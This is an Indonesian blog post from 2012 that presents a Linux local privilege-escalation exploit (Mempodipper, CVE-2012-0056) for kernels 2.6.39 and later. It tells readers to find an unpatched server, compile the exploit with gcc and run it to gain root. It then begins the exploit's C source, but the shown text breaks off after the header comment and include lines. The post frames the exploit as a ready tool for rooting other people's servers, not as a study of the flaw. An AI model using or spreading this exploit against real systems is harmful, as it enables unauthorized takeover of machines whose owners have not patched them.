Skip to main content

Posts

Showing posts from February, 2012

10 Aplikasi Android Terbaik untuk Kesehatan

Localroot Linux Exploit >= 2.6.39

Berikut adalah step-by-step cara melakukan root / ngeroot di dalam semua linux dengan kernel mulai dari 2.6.39 ke atas. Sudah lama tidak melakukan root’ing bukan, cara melakukannya adalah 1. Cari server dengan kernel 2.6.39 keatas yang belum di patch 2. Compile source code localroot exploit dengan menggunakan gcc 3. Jalankan localroot exploit Berikut codenya untuk localroot exploit: C /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/user.h> #